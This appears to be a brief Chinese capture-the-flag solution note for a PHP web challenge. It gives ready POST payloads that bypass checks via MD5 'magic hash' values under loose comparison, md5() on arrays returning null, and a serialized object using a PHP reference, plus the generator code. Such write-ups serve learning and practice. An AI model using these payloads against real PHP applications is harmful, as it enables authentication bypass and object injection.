知识点:地址传值
法1:
GET:?pleaseget=1
POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0
法2:
GET:?pleaseget=1
POST:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
原理:MD5无法加密数组,返回null所以相等
<?php
class BUU {
public $correct = "";
public $input ="";
}
$a = new BUU();
$a->input=&$a->correct;//把地址赋值过去,地址相同,值肯定也相同。
echo serialize($a);
?>